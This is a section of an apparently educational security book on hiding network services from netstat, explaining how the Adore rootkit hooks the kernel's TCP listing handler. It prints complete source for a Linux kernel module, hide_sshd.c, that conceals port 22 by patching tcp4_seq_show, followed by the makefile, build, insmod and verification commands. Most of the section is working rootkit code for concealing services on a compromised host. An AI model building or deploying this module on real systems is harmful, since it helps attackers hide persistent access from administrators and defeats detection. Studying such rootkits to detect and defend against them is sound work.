Section 7.4. Hiding from netstat

7.4. Hiding from netstat

The netstat tool lists currently running network services on a host:

[notroot]$ netstat -na Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address   Foreign Address  State tcp        0      0 0.0.0.0:22      0.0.0.0:*        LISTEN udp        0      0 0.0.0.0:68      0.0.0.0:* Active UNIX domain sockets (servers and established) Proto RefCnt Flags     Type    State      I-Node Path unix  2      [ ACC ]   STREAM  LISTENING  2085   /dev/gpmctl unix  6      [ ]       DGRAM              1886   /dev/log unix  2      [ ]       DGRAM              2153 unix  2      [ ]       DGRAM              2088 unix  2      [ ]       DGRAM              2046 unix  2      [ ]       DGRAM              1894

The Adore rootkit allows you to hide a given set of listening services from a netstat query. It does this by using the exported proc_net structure to change the tcp4_seq_show( ) handler, which is invoked by the kernel when netstat queries for listening connections. Within the hacked_tcp4_seq_show() function in hide_sshd.c, strnstr( ) is used to look in seq->buf for a substring that contains the hex representation of the port it is trying to hide, and if this is found, the string is deleted.

7.4.1. hide_sshd.c

Following is the full source code of the hide_sshd LKM:

/*Thanks to adore-ng from Stealth for the ideas used in this code*/ #include <linux/kernel.h> #include <linux/module.h> #include <linux/proc_fs.h> #include <linux/init.h> #include <net/tcp.h> /*from net/ipv4/tcp_ipv4.c*/ #define TMPSZ 150 /*hide sshd*/ #define PORT_TO_HIDE 22 MODULE_LICENSE("GPL"); int (*old_tcp4_seq_show)(struct seq_file*, void *) = NULL; char *strnstr(const char *haystack, const char *needle, size_t n) {         char *s = strstr(haystack, needle);         if (s == NULL)                 return NULL;         if (s-haystack+strlen(needle) <= n)                 return s;         else                 return NULL; } int hacked_tcp4_seq_show(struct seq_file *seq, void *v) {         int retval=old_tcp4_seq_show(seq, v);         char port[12];         sprintf(port,"%04X",PORT_TO_HIDE);         if(strnstr(seq->buf+seq->count-TMPSZ,port,TMPSZ))                 seq->count -= TMPSZ; return retval;    } static int __init myinit(void) {         struct tcp_seq_afinfo *my_afinfo = NULL;         struct proc_dir_entry *my_dir_entry = proc_net->subdir;         while (strcmp(my_dir_entry->name, "tcp"))                 my_dir_entry = my_dir_entry->next;         if((my_afinfo = (struct tcp_seq_afinfo*)my_dir_entry->data))         {                 old_tcp4_seq_show = my_afinfo->seq_show;                 my_afinfo->seq_show = hacked_tcp4_seq_show;         }                                   return 0; }          static void myexit(void) {         struct tcp_seq_afinfo *my_afinfo = NULL;         struct proc_dir_entry *my_dir_entry = proc_net->subdir;           while (strcmp(my_dir_entry->name, "tcp"))                 my_dir_entry = my_dir_entry->next;                  if((my_afinfo = (struct tcp_seq_afinfo*)my_dir_entry->data))         {                 my_afinfo->seq_show=old_tcp4_seq_show;         }                  }                        module_init(myinit); module_exit(myexit);

7.4.2. Compiling and Testing hide_sshd

The hide_sshd.c source code assumes we are trying to hide the presence of sshd running on a host. If you want to hide any other service, change the value of PORT_TO_HIDE. For the purposes of this section, we assume that sshd is running on the host. Make sure by running netstat:

[notroot]$ netstat -na | grep 22 tcp     0     0.0.0.0:22    0.0.0.0:*    LISTEN

Use the following makefile:

obj-m += hide_sshd.o

Compile using the following make command:

[notroot]$ make -C /usr/src/linux-`uname -r` SUBDIRS=$PWD modules

Insert the module:

[root]# insmod ./hide_sshd.ko

Now sshd will not be visible. Try the netstat query again:

[notroot]# netstat -na | grep 22

Unload the module when done:

[root]# rmmod hide_sshd